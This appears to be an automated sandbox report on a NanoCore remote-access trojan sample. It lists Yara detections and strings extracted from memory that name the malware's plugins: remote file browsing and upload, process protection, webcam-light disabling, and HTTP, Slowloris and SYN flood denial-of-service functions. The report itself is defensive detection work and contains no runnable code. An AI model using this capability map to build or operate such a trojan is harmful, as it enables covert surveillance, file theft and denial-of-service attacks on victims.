Source: Yara match	File source: 13.2.RegSvcs.exe.4977af2.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.497c92f.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4982365.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.643242754.0000000004829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: boaliim.dat PID: 7512, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7772, type: MEMORYSTR

OS version to string mapping found (often used in BOTs)

Source: boaliim.dat	Binary or memory string: WIN_81
Source: boaliim.dat	Binary or memory string: WIN_XP
Source: boaliim.dat.0.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: boaliim.dat	Binary or memory string: WIN_XPe
Source: boaliim.dat	Binary or memory string: WIN_VISTA
Source: boaliim.dat	Binary or memory string: WIN_7
Source: boaliim.dat	Binary or memory string: WIN_8

Remote Access Functionality

Detected Nanocore Rat

Source: boaliim.dat, 00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: boaliim.dat, 00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: boaliim.dat, 00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: boaliim.dat, 00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: boaliim.dat, 00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: boaliim.dat, 00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: boaliim.dat, 00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
Source: RegSvcs.exe, 0000000D.00000002.651409238.0000000007B00000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.651594442.0000000007B30000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: RegSvcs.exe, 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
Source: RegSvcs.exe, 0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
Source: RegSvcs.exe, 0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
Source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
Source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
Source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullE